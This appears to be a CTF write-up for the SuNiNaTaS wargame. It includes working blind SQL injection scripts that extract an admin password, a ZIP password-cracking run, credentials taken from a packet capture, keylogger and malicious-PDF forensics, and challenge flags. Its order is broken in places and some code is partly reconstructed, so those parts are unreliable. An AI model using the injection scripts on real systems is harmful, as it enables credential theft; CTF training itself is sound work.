Game 01
```asp
<%
str = Request("str")
If not str = "" Then
    result = Replace(str,"a","aad")
    result = Replace(result,"i","in")
    result1 = Mid(result,2,2)
    result2 = Mid(result,4,6)
    result = result1 & result2
    Response.write result
    If result = "admin" Then
        pw = "????????"
    End if
End if
%>
```
ami (the two Replace calls turn `ami` into `aadmin`; Mid(2,2) = `ad` and Mid(4,6) = `min` give `admin`)
Game 02
```html
<script>
function chk_form() {
    var id = document.web02.id.value;
    var pw = document.web02.pw.value;
    if (id == pw) {
        alert("You can't join! Try again");
        document.web02.id.focus();
        document.web02.id.value = "";
        document.web02.pw.value = "";
    } else {
        document.web02.submit();
    }
}
</script>
<!-- Hint : Join / id = pw -->
<!-- M@de by 2theT0P -->
```
The check only runs in the browser; resend the join request from the browser's network tab with:
```
id=admin&pw=admin
```
Game 03
http://suninatas.com/board/notice/write
1q2w3e4r5t6y7u8i9o0p
Game 04
```html
<!-- Hint : Make your point to 50 & 'SuNiNaTaS' -->
<!-- M@de by 2theT0P -->
```
```
❯ file Project1.exe
Project1.exe: PE32 executable for MS Windows 4.00 (GUI), Intel i386, 8 sections
```
Check the strings listing:
```
CODE:0045041C 00000010 C Congratulation!
CODE:00450434 0000000B C Authkey :
CODE:004504B8 00000009 C 2abbe4b6
CODE:004504CC 00000009 C 44536ca0
CODE:004504E0 00000009 C 81aae922
CODE:004504F4 00000009 C e32fa0de
```
```
# suggest to use unar btw
# it handles the Korean filename automatically
❯ unar web13.zip
압축비번은4자리정수
```
Translation: "The compression password is a 4-digit integer."
```
# john the ripper btw, seclist btw (all from github)
❯ zip2john web13.zip > hash.txt
❯ john hash.txt --wordlist=~/ctf/tool/dic/SecLists/Fuzzing/4-digits-0000-9999.txt
...
7642 (web13.zip)
...
```
```
# unar again
# open 압축비번은4자리정수.txt with encoding EUC-KR
# i use vscode btw
```
4개의 이미지를 합하여 key를 구하시오 -> Combine the four images to find the key.
```
# what is a pcap file? # Packet Capture
# no need for wireshark btw :)
# grep for keywords like pass, password etc. and you will notice these POST bodies
❯ strings packet_dump.pcap | grep Hpw=
Hid=suninatas&Hpw=suninatasc
Hid=blackkey&Hpw=blackkeyn
Hid=ultrashark&Hpw=sharkpass01~
Hid=ultrashark&Hpw=%3Dsharkpass01
Hid=ultrashark&Hpw=%3DSharkPass01
```
```
# try logging in with all of the id/pass pairs
Congratulation! Authkey : ********************************
```
WireSharkBetterThanWirelessShark
Game 17
```
convert qr.png -threshold 85% out.png
convert out.png -background black -alpha remove -alpha off oo.png
```
I don't know how to use GIMP; use Krita btw: drag the three pattern pictures over the image in Krita, then scan it with zbarimg.
```
Good Job! Congraturation! AuthKey is YouAreQRCodeMaster~!
```
```python
import requests

# The target URL, cookies and charset are not shown in the writeup; placeholders (assumed).
url = "http://TARGET/login.asp"
cookies = {}
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789)(+*!@#$%^&-_="

password = ""
for i in range(1, 31):
    found_char = False
    for char in charset:
        # substring(pw, index, length): test the single character of pw at position i
        payload = f"'and(substring(pw,{i},1)='{char}')--"

        params = {
            'id': 'admin' + payload,
            'pw': 'a',
        }

        try:
            target_url = f"{url}?id={params['id']}&pw={params['pw']}"
            r = requests.get(target_url, cookies=cookies)
            if "OK" in r.text:
                password += char
                print(f"[+] Found char at index {i}: {char}")
                found_char = True
                break
        except Exception as e:
            print(f"[!] Error: {e}")

    if not found_char:
        print("[-] End of password or char not in charset.")
        break

print(f"\n[SUCCESS] Final Password: {password}")
```
```
[+] Found char at index 1: N
[+] Found char at index 2: 1
[+] Found char at index 3: c
[+] Found char at index 4: 3
[+] Found char at index 5: B
[+] Found char at index 6: i
[+] Found char at index 7: l
[+] Found char at index 8: n
[+] Found char at index 9: l
[+] Found char at index 10: )
[+] Found char at index 11: +
[+] Found char at index 12: +
...
```
```python
import sys
import requests

# These constants are not shown in the writeup; placeholder values (assumed).
TARGET_URL = "http://TARGET/login.asp"
COOKIES = {}
CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789)(+*!@#$%^&-_="
MAX_LENGTH = 30
SUCCESS_INDICATOR = "OK"
ERROR_INDICATOR = "Error"   # placeholder for whatever the page returns on a broken query


def check_str(i, candidate):
    # The head of this function is missing from the writeup; the payload is reconstructed
    # from the first script's substring() test, here comparing the first i characters at once.
    payload = f"'and(substring(pw,1,{i})='{candidate}')--"
    params = {'id': 'admin' + payload, 'pw': 'a'}
    try:
        # Note: Using params in requests.get handles URL encoding automatically
        response = requests.get(TARGET_URL, params=params, cookies=COOKIES, timeout=5)
        if ERROR_INDICATOR in response.text:
            print(f"\n[!] Error: {response.text}")
            exit()
        return SUCCESS_INDICATOR in response.text
    except requests.RequestException as e:
        print(f"\n[!] Request error: {e}")
        return False


def main():
    print(f"[*] Starting Blind SQL Injection on {TARGET_URL}")
    print(f"[*] Target max length: {MAX_LENGTH}")

    extracted_string = ""

    for i in range(1, MAX_LENGTH + 1):
        found = False
        # Visual progress for the current index
        sys.stdout.write(f"[*] Finding char {i:02}: ")
        sys.stdout.flush()

        for char in CHARSET:
            if check_str(i, extracted_string + char):
                extracted_string += char
                sys.stdout.write(f"{char}\n")
                sys.stdout.flush()
                found = True
                break
        if not found:   # (added) stop when no character matches at this position
            break

    print(f"\n[SUCCESS] Extracted: {extracted_string}")


if __name__ == "__main__":
    main()
```
Second attempt: the same script, with only the inner loop changed to test the new character prepended to what was already found (the author's `# need reverse??`):
```python
        for char in CHARSET:
            # need reverse??
            ##############################################################################
            # note: the candidate is tested prepended, but still stored appended
            if check_str(i, char + extracted_string):
                extracted_string += char
                sys.stdout.write(f"{char}\n")
                sys.stdout.flush()
                found = True
                break
```
I don't know why, but it only works on my phone (I just copied the URL into the phone browser), even if I change the PC browser's UA.
Auth_key = StARtANdr0idW0r1d
Game 25
```
❯ file Suninatas25
Suninatas25: Zip archive data, made by v2.0, extract using at least v2.0, last modified, last modified Sun, Aug 05 2019 10:34:20, uncompressed size 328936, method=deflate
❯ unar Suninatas25
Suninatas25: Zip
"Suninatas25" already exists. (r)ename to "Suninatas25-1", (R)ename all, (o)verwrite, (O)verwrite all, (s)kip, (S)kip all, (q)uit? r
  class.dex  (328936 B)... OK.
  Androidmanifest.xml  (1732 B)... OK.
  resource.arsc  (2600 B)... OK.
Successfully extracted to "Suninatas25-1".
```
```
# it is actually an APK: mv it to suninatas25.apk and open it with jadx
```
```java
public String getContacts(String Sel) {
    StringBuffer sb = new StringBuffer();
    Cursor contacts = getContentResolver().query(ContactsContract.Contacts.CONTENT_URI, null, null, null, null);
    while (contacts.moveToNext()) {
        String displayName = contacts.getString(contacts.getColumnIndex("display_name"));
        String contactId = contacts.getString(contacts.getColumnIndex("_id"));
        if (displayName.equals("SuNiNaTaS")) {   // <-- the contact name must be SuNiNaTaS
            if (Sel.equals("sb")) {
                sb.append(displayName);
            } else if (Sel.equals("id")) {
                sb.append(contactId);
            }
        }
    }
    return sb.toString();
}
```
```
http://www.suninatas.com/challenge/web25/chk_key.asp?id=arstarst&pw=arstarst&Name=SuNiNaTaS&Number=??
```
`Number=??` <- click the Make button to get the number; use a test account btw
```
Congratulations! auth_key is ************************
```
FanTast1c aNdr0id w0r1d!
Game 26
This challenge is to recover the plaintext from the following ciphertext using frequency analysis:
Note that we have omitted the blank letters and punctuation marks of the plaintext.
```
# random substitution cipher
# Frequency analysis counts how often each letter occurs in the ciphertext. A simple
# substitution keeps the letter counts of the plaintext, so the most frequent cipher
# letters line up with the most frequent English letters (E, T, A, ...); that gives a
# first guess at the key, which you then correct by hand as words become readable.
$ echo "$CIPHER" | fold -w1 | sort | uniq -c | sort -nr
     92 n
     78 z
     69 g
     65 c
     65 b
     62 v
     60 i
     59 y
     58 p
     31 x
     30 q
     27 a
     26 h
     25 f
     22 m
     20 o
     19 d
     14 s
      9 k
      7 j
      5 e
      4 t
      3 r
      2 u
      1 l
```
kim yuna is a south korean figure skater she is the olympic champion in ladies singles the world champion the four continents champion a three time grand prix final champion the world junior champion the junior grand prix final champion and a four time south korean national champion kim is the first south korean figure skater to win a medal at an isu junior or senior grand prix event is u championship and the olympic games she is the first female skater to win the olympic games the world championships the four continents championships and the grand prix finals he is one of the most highly recognized athletes and media figures in south korea as of april this year she is ranked second in the world by the international skating union she is the current record holder for ladies in the short program the free skating and the combined total under the isu judging systems he is also the first female skater to surpass the two hu dread point mark under the isu judging systems he has never been placed off the podium in her entire career
kimyuna
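As an added example (not part of the writeup), the steps above in Python: count letters, build a first key from English letter frequencies, then pin letters by hand once words like `kim` or `champion` become readable. The plaintext is the recovered sentence above with spaces removed; the cipher alphabet is a constructed key, since the challenge ciphertext itself is not reproduced here.

```python
from collections import Counter
from string import ascii_lowercase

# Standard English letter order, most frequent first (reference table, assumed).
ENGLISH_ORDER = "etaoinshrdlcumwfgypbvkjxqz"
# Constructed key for the demonstration: plaintext letter i -> CIPHER_ALPHABET[i].
CIPHER_ALPHABET = "qwertyuiopasdfghjklzxcvbnm"
KEY = dict(zip(ascii_lowercase, CIPHER_ALPHABET))
# Opening sentences of the recovered plaintext above, letters only (the challenge strips spaces).
PLAINTEXT = ("kimyunaisasouthkoreanfigureskatersheistheolympicchampioninladiessingles"
             "theworldchampionthefourcontinentschampionathreetimegrandprixfinalchampion"
             "theworldjuniorchampionthejuniorgrandprixfinalchampionandafourtimesouthkoreannationalchampion")


def substitute(text, mapping):
    """Apply a letter-to-letter mapping; unmapped characters pass through unchanged."""
    return "".join(mapping.get(ch, ch) for ch in text)


def invert(mapping):
    return {v: k for k, v in mapping.items()}


def letter_frequencies(text):
    """(letter, count) pairs, most frequent first, like `fold -w1 | sort | uniq -c | sort -nr`."""
    counts = Counter(ch for ch in text.lower() if ch in ascii_lowercase)
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


def guess_key(ciphertext):
    """First guess: i-th most frequent cipher letter -> i-th most frequent English letter."""
    order = [ch for ch, _ in letter_frequencies(ciphertext)]
    return dict(zip(order, ENGLISH_ORDER))


def refine(guess, cipher_letter, plain_letter):
    """Pin cipher_letter to plain_letter, swapping with whatever previously mapped to it."""
    new = dict(guess)
    for c, p in guess.items():
        if p == plain_letter:
            new[c] = guess.get(cipher_letter, p)  # if cipher_letter is unmapped, c keeps its value
    new[cipher_letter] = plain_letter
    return new


def accuracy(decoded, plaintext):
    """Fraction of positions recovered correctly, i.e. how good the current key is."""
    return sum(a == b for a, b in zip(decoded, plaintext)) / len(plaintext)


def demo():
    """Accuracy after the pure frequency guess, then after pinning 'c' and 'h' by hand."""
    ciphertext = substitute(PLAINTEXT, KEY)
    guess = guess_key(ciphertext)
    first = accuracy(substitute(ciphertext, guess), PLAINTEXT)
    pinned = refine(guess, KEY["c"], "c")      # in practice: you spotted "_hampion" in the decode
    pinned = refine(pinned, KEY["h"], "h")
    second = accuracy(substitute(ciphertext, pinned), PLAINTEXT)
    return first, second


if __name__ == "__main__":
    for letter, count in letter_frequencies(substitute(PLAINTEXT, KEY))[:8]:
        print(f"{count:4d} {letter}")
    print("accuracy after frequency guess, then after pinning c and h: %.2f -> %.2f" % demo())
```

Pinning a correct pair never lowers the score, because both letters involved were wrong before the swap; that is what makes iterating by hand converge.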
Game 27
NSA has intercepted a chatter between mafia organization members from an IRC server. investigators are certain that the message has some secret, however they can't find any clue. your mission is to help the NSA investigators and reveal the secret of this message.
Pruss is my name. I am a member of russian mafia group. we
communacate via a secure channel with secure password like.. \(A\)"4kruss password has to be long and it
should contain alphabet, number, etc. I added 'russ' at the end because
my name is Pruss. and this is our password convention. we must add
'russ' to end.. because it is our code name and we are very bad russian.
we use secure communication since FBI monitors our communications on the
Internet. we can't use password like DDDDDHHHHHHPDDDDDruss. because
these passwords can be easily broken by FBI hackers. even if the
password is long enough,(something like @@@@@@@@@@@@@@@@@@@@russ) it is not secure
because there is only one repeated character '@'. anyway, using secure
password is important... Pruss is actually not only my name, it is also
code name of our mafia. we use similar names. one of my friend's name is
Druss. Druss is my best friend and a professional killer. but he is not
good at security. one day Druss used a password DDDDruss I told him this
is very bad and weak password. the FBI will break it very easily. so he
changed his password into HHHHHHHHHHHHHHHHHHHHHHHHHHruss. I told him
even if password is long, it is weak if there is no combination with
number and symbol... he said 'ok Pruss, this time I'll make a very long
and secure password which contains number and symbol as well!' and he
made '11111DDDDD@@@@@@@@@@PDDDDD@@@@@@@@@@PDDDDDHHHHHHHHHHHHHHHHHHHHruss'!!
and asked me if this is secure enough. I told him it is secure, but it
is long to remember. he said 'thank you Pruss you always teach me
computer security' anyway this was small talk and I will tell you
something about mafia life. Druss likes to listen to music, such as
rock, pop and jazz... even though he is a tough killer he has sensitive
heart.. Druss likes to dressed up with very black jacket with black
jean, he thinks it is a cool fashion, but I don't like it.. Druss has
high IQ, he is a member of group called MENSA(group of people who has IQ
over 150) so, he is very very smart. Druss has a girl friend, her name
is Hruss. Hruss is also my friend too. she is very very pretty, and also
a killer(!). Druss likes Hruss a lot, they are in love with each other.
it is common case that mafia members hooks up together. mafia@russia.ru
is our server. we have lot of data regarding our crimes in our server so
FBI hackers are trying to hack mafia@russia.ru but we don't have to
worry since we are using secure password(we discussed this) as I told
earlier. anyway.. Pruss sounds somewhat like 'Press' so, Press is my
nick name it is somewhat juvenile but I think it is pretty funny too
Druss always makes fun of me by using my nick name 'Press' sometimes I
got angry but I don't express my feeling because Druss is a professional
killer I don't want to get shot. it is possible to get shot by mafia
friends. it happened once. Druss shot a friend many years ago, he was
also a mafia member. they had a quarrel and it turned into very big
fight so Druss shot other friend... after that incident, I always say
something nicely to him. in fact the secure password which Druss have
created earlier I felt it was very stupid password. however I told him
very nicely. who makes password like '@@PDDDDDPDDDDDHPDDDDD@@@@@PDDDDDPDDDDD@@@PDDDDDruss'? no body
will ever think that this is a password. to me, a secure password will
be say something like... kNz3i!Bs4jP
```python
import sys
from unicorn import Uc, UcError, UC_ARCH_X86, UC_MODE_32, UC_HOOK_MEM_WRITE, UC_MEM_WRITE
from unicorn.x86_const import UC_X86_REG_EAX, UC_X86_REG_ESP

# These constants are not shown in the writeup; assumed values.
CODE_FILE = "code.bin"          # raw x86 code carved out of the binary
BASE_ADDRESS = 0x1000000
STACK_ADDRESS = 0x2000000
MEM_SIZE = 2 * 1024 * 1024

flag_chars = []


def hook_mem_write(uc, access, address, size, value, user_data):
    """
    Monitor memory writes to catch PUSH instructions.
    In many CTF challenges, characters are pushed onto the stack one by one.
    """
    if access == UC_MEM_WRITE:
        try:
            char = chr(value)
            if char.isprintable():
                flag_chars.append(char)
                print(f"[!] Stack Push: '{char}' (0x{value:02x})")
        except Exception:
            pass


def main():
    # Load the shellcode/binary
    try:
        with open(CODE_FILE, 'rb') as f:
            code = f.read()
    except FileNotFoundError:
        print(f"Error: {CODE_FILE} not found.")
        sys.exit(1)

    print(f"Emulating x86 code ({len(code)} bytes)...")

    try:
        # Initialize emulator in x86 32-bit mode
        mu = Uc(UC_ARCH_X86, UC_MODE_32)

        # Map memory for code and stack
        mu.mem_map(BASE_ADDRESS, MEM_SIZE)
        mu.mem_map(STACK_ADDRESS, MEM_SIZE)

        # Write code to memory
        mu.mem_write(BASE_ADDRESS, code)

        # Initialize registers
        mu.reg_write(UC_X86_REG_EAX, 0x0)
        # Set stack pointer to the middle of the mapped stack region
        mu.reg_write(UC_X86_REG_ESP, STACK_ADDRESS + (MEM_SIZE // 2))

        # Register the write hook (missing from the writeup; without it nothing is captured)
        mu.hook_add(UC_HOOK_MEM_WRITE, hook_mem_write)

        # Execute the code
        mu.emu_start(BASE_ADDRESS, BASE_ADDRESS + len(code))

    except UcError as e:
        # Emulation often ends with an error when shellcode runs off the end
        # or lacks a proper exit syscall, which is expected.
        print(f"\nEmulation stopped: {e}")

    # Output the results
    if flag_chars:
        print("\n" + "=" * 20)
        print(f"Extracted Flag: {''.join(flag_chars)}")
        print("=" * 20)
    else:
        print("\nNo printable characters captured from stack writes.")


if __name__ == "__main__":
    main()
```
```
❯ file So_Simple.zip
So_Simple.zip: Zip archive data, made by v2.0, extract using at least v2.0, last modified, last modified Sun, Oct 21 2013 15:07:58, uncompressed size 205, method=deflate
❯ unar So_Simple.zip
So_Simple.zip: Zip
  Am_I_key.zip  (205 B)... OK.
  Am_I_key2.txt  (4335 B)... OK.
  Am_I_key3.txt  (1445 B)... OK.
Successfully extracted to "So_Simple".
~/Downloads ❯ y
~/Downloads/So_Simple ❯ unar Am_I_key.zip
Am_I_key.zip: Zip
  There_is_key.txt  (61 B)... OK.
Successfully extracted to "./There_is_key.txt".
```
```
# cat There_is_key.txt
Isn't it so easy? Take it. dGE1dHlfSDR6M2xudXRfY29mZmVl
# from base64
ta5ty_H4z3lnut_coffee
```
Or use radare2: press V (visual mode) and then i to change the hex value 0x0908 to 0x0008.
```
Joon-hyeok asked Seong-joon to repair PC
After repairing, Seong-joon did something to PC
You should fix this PC.

Q1 : When you surf "www.naver.com", Web browser shows something wrong. Fix it and you can find a Key
Q2 : Installed Keylogger's location & filename (All character is lower case) - ex) c:\windows\notepad.exe
Q3 : Download time of Keylogger - ex) 2016-05-27_22:00:00 (yyyy-mm-dd_hh:mm:ss)
Q4 : What did Keylogger detect and save? There is a Key

Auth Key = lowercase(MD5(Key of Q1+Answer of Q2+Answer of Q3+Key of Q4))
```
```
❯ file 'Windows7(SuNiNaTaS)'
Windows7(SuNiNaTaS): EGG archive data, version 1.0
```
An EGG file (.egg) is a compressed archive format developed by ESTsoft, primarily for its ALZip software, and commonly used in South Korea. It works much like a .zip file but offers better Unicode support and efficient compression; it is frequently used for distributing large files and supports split volumes.
```
~/Downloads/Windows7(SuNiNaTaS) ❯ la
total 8.0G
drwxr-xr-x 1 kita kita   28 Feb 15 14:08  caches/
-rw-r--r-- 1 kita kita 2.0M May 24  2016  vmware-0.log
-rw-r--r-- 1 kita kita 384K May 24  2016  vmware.log
-rw-r--r-- 1 kita kita  53M May 24  2016 'Windows 7-000001.vmdk'
-rw-r--r-- 1 kita kita 8.5K May 24  2016 'Windows 7.nvram'
-rw-r--r-- 1 kita kita 1.0G May 24  2016 'Windows 7-Snapshot2.vmem'
-rw-r--r-- 1 kita kita 2.1M May 24  2016 'Windows 7-Snapshot2.vmsn'
-rw-r--r-- 1 kita kita 6.9G May 24  2016 'Windows 7.vmdk'
-rw-r--r-- 1 kita kita  445 May 24  2016 'Windows 7.vmsd'
-rw-r--r-- 1 kita kita 3.2K May 24  2016 'Windows 7.vmx'
-rw-r--r-- 1 kita kita 4.6K May 24  2016 'Windows 7.vmxf'
```
The archive is a VMware virtual machine. Mount the disk read-only and check the hosts file for Q1:
```
~/Downloads/Windows7(SuNiNaTaS) took 30s ❯ sudo guestmount -a "Windows 7.vmdk" -m /dev/sda1 --ro /mnt/win
❯ sudo cat /mnt/win/Windows/System32/drivers/etc/hosts
[sudo] password for kita:
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host
121.189.57.82 naver.com
121.189.57.82 www.naver.com
#
#
# C0ngr4tur4ti0ns!! This is a Keeeeeeeeeeey : what_the_he11_1s_keey
#
#
# localhost name resolution is handled within DNS itself.
#	127.0.0.1       localhost
#	::1             localhost
```
```
# stat gives the wrong time for Q3: we would need the creation (Birth) time, which is empty here,
# and the other times are shown in my host's zone (UTC+8)
[root@kita233 v196vv8]# stat v1tvr0.exe
  File: v1tvr0.exe
  Size: 1594368   	Blocks: 3120       IO Block: 4096   regular file
Device: 0,81	Inode: 109         Links: 1
Access: (0777/-rwxrwxrwx)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2016-05-24 03:26:09.330498800 +0800
Modify: 2010-07-07 06:50:09.109375000 +0800
Change: 2016-05-24 03:26:09.361698900 +0800
 Birth: -
```
```
# check the MFT (Master File Table) in the memory snapshot: same time, still not the download time
❯ vol -f 'Windows 7-Snapshot2.vmem' -s ./volsym windows.mftscan.MFTScan | grep -i "v1tvr0.exe"
* 0xe8b38b0100.0FILE 50282 1DB scanFile finArchive FILE_NAME 2016-05-23 19:26:09.000000 UTC 2016-05-23 19:26:09.000000 UTC 2016-05-23 19:26:09.000000 UTC 2016-05-23 19:26:09.000000 UTC v1tvr0.exe
```
```
# need to check the browser download history
# the user used IE, which stores its history in index.dat
[root@kita233 win]# find . -name "index.dat" -exec strings -f {} \; | grep -i "exe"
...
./Users/training/AppData/Local/Microsoft/Windows/History/History.IE5/index.dat: Visited: training@http://192.168.163.1/files/pc-spy-2010-keylogger-surveillance-spy-3.exe   <- a keylogger ("pc-spy")
...
```
```
URL  Visited: training@http://192.168.163.1/files/pc-spy-2010-keylogger-surveillance-spy-3.exe  05/24/2016 03:25:06  05/24/2016 03:25:06
# this time is displayed in UTC+8; the challenge wants UTC+9, so add one hour
2016-05-24_04:25:06
```
Q4: What did the keylogger detect and save? There is a key
```
# 4:37:57 How did you know pAsS\orD? Wow... Kee22 ls "blackkey is a Good man"
```
# the key is: blackkey is a Good man

Auth Key = lowercase(MD5(Key of Q1+Answer of Q2+Answer of Q3+Key of Q4))
```
what_the_he11_1s_keeyc:\v196vv8\v1tvr0.exe2016-05-24_04:25:06blackkey is a Good man
```
use CyberChef btw, MD5:
```
970f891e3667fce147b222cc9a8699d4
```
Game 30
one of the most interesting game, be sure to try it first.
```
General Kim's PC was hacked by Hacker
Here is a Memory Dump at that time, You should find what Hacker did

Q1 : IP Address of General Kim's PC
Q2 : Which secret document did Haker read?
Q3 : What is content of secret document? There is a "Key"

Auth Key = lowercase(MD5(Answer of Q1+Answer of Q2+Key of Q3))
```
```
❯ pdf-parser -h
Options:
  -s SEARCH, --search=SEARCH  string to search in indirect objects (except streams)
  -f, --filter                pass stream object through filters (FlateDecode, ASCIIHexDecode, ASCII85Decode, LZWDecode and RunLengthDecode only)
  -o OBJECT, --object=OBJECT  id(s) of indirect object(s) to select, use comma (,) to separate ids (version independent)
  -w, --raw                   raw output for data and filters
  ...
```
```
❯ pdf-parser -s JavaScript Hello_SuNiNaTaS.pdf
This program has not been tested with this version of Python (3.14.2)
Should you encounter problems, please use Python version 3.12.2
obj 30 0
 Type:
 Referencing: 31 0 R, 38 0 R

  <<
    /JavaScript 31 0 R      <-
    /EmbeddedFiles 38 0 R   <- pdfid does not report it, but pdf-parser finds it: a nested (embedded) object
  >>

obj 36 0
 Type:
 Referencing:
```
```
❯ pdf-parser -o 38 Hello_SuNiNaTaS.pdf
obj 38 0
 Type:
 Referencing: 40 0 R
```
```
❯ pdf-parser -o 39 -f -d nested.pdf Hello_SuNiNaTaS.pdf
obj 39 0
 Type:
 Referencing:
 Contains stream   <- dumped to nested.pdf
```
```
❯ pdf-parser -s js decrypted.pdf
obj 2 0
 Type: /Action
 Referencing: 4 0 R

  <<
    /JS 4 0 R   <- Object 4 is a stream object
    /S /JavaScript
    /Type /Action
  >>
```
```
❯ pdf-parser -o 4 decrypted.pdf
obj 4 0
 Type:
 Referencing:
 Contains stream

  <<
    /Filter /FlateDecode
    /Length 45
  >>
```
```
❯ pdf-parser -o 4 -f -d dump decrypted.pdf
❯ cat dump
"HERE IS FLAGS *********************"⏎
# omg the flag is here, don't forget to md5 it
```
```
~/Downloads ❯ pdf-parser -o 35 -f -w Hello_SuNiNaTaS.pdf
obj 35 0
 Type:
 Referencing: 36 0 R, 37 0 R
 <</S 36 0 R/JS 37 0 R>>

  <<
    /S 36 0 R
    /JS 37 0 R
  >>
```
```
~/Downloads ❯ pdf-parser -o 37 -f -w Hello_SuNiNaTaS.pdf
obj 37 0
 Type:
 Referencing: 1 4 R
 Contains stream
```
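The object chain pdf-parser walks above (a `/JavaScript` name entry, an action dictionary, its `/JS` reference, and finally a FlateDecode stream) can be followed with a few regular expressions. This added example (mine, not from the writeup or from the pdf-parser project) builds a constructed minimal PDF with that chain and pulls the script out of it; it handles only FlateDecode streams and unescaped inline `/JS (...)` strings, which is enough to see why a name-only scan can miss a script hidden behind a reference.

```python
import re
import zlib

# Constructed sample script and PDF (not the challenge file): catalog -> /JavaScript name tree
# -> action dictionary -> /JS reference -> FlateDecode stream holding the script.
SAMPLE_JS = b"app.alert('constructed sample');"


def build_sample_pdf(js=SAMPLE_JS):
    body = zlib.compress(js)
    objs = [
        b"<< /Type /Catalog /Names << /JavaScript 2 0 R >> /OpenAction 3 0 R >>",
        b"<< /Names [(init) 3 0 R] >>",
        b"<< /S /JavaScript /Type /Action /JS 4 0 R >>",
        b"<< /Filter /FlateDecode /Length " + str(len(body)).encode()
        + b" >>\nstream\n" + body + b"\nendstream",
    ]
    out = b"%PDF-1.4\n"
    for n, o in enumerate(objs, 1):
        out += b"%d 0 obj\n" % n + o + b"\nendobj\n"
    return out + b"%%EOF\n"


OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\s*(.*?)\s*endobj", re.S)
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)


def objects(pdf):
    """Map object number -> raw body for every 'N G obj ... endobj' in the file."""
    return {int(m.group(1)): m.group(3) for m in OBJ_RE.finditer(pdf)}


def stream_data(body):
    """Decoded stream content (FlateDecode only, like pdf-parser -f), or None if no stream."""
    m = STREAM_RE.search(body)
    if not m:
        return None
    data = m.group(1)
    return zlib.decompress(data) if b"/FlateDecode" in body else data


def find_name(pdf, name):
    """Object numbers whose dictionary part (not the stream data) contains the name, like -s."""
    return sorted(n for n, b in objects(pdf).items() if name in b.split(b"stream", 1)[0])


def extract_js(pdf):
    """Follow /JS from every action dictionary to its target and return the scripts found."""
    objs = objects(pdf)
    scripts = []
    for n in find_name(pdf, b"/JS"):
        dict_part = objs[n].split(b"stream", 1)[0]
        ref = re.search(rb"/JS\s+(\d+)\s+\d+\s+R", dict_part)
        if not ref:
            # Inline string form /JS (...); greedy match up to the last ')' in the dictionary.
            inline = re.search(rb"/JS\s*\((.*)\)", dict_part, re.S)
            if inline:
                scripts.append(inline.group(1))
            continue
        target = objs.get(int(ref.group(1)))
        data = stream_data(target) if target is not None else None
        if data is not None:
            scripts.append(data)
    return scripts


if __name__ == "__main__":
    pdf = build_sample_pdf()
    print("objects mentioning /JavaScript:", find_name(pdf, b"/JavaScript"))
    print("scripts:", extract_js(pdf))
```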
```
You got a USB image of terrorist from the National Police Agency. A beginner made a USB image wrong, So your PC couldn't recognize it.
You should fix a USB image and prevent next terror.
Q1 : What is modified date/time of the file which contains next terror plan. (UTC+9)
Q2 : Where is the next terror target.
```
```
# use sleuthkit to check the file system type
❯ fsstat -f fat32 usb
Invalid magic value (Error: sector size (4352) is not a multiple of device size (512)
Do you have a disk image instead of a partition image?)
```
An HWP file (Hangul Word Processor) is a proprietary document format developed by Hancom Inc. and used primarily in South Korea. It is the standard word-processing format for Korean government, academic and business documents, akin to Microsoft Word's .docx but designed for the Hangul script.

Opening HWP and HWPX files requires readers that can handle these formats. Because of their specificity, few word processors can; among the accessible options is ONLYOFFICE Desktop Editors, whose version 8.3 made working with these files easier.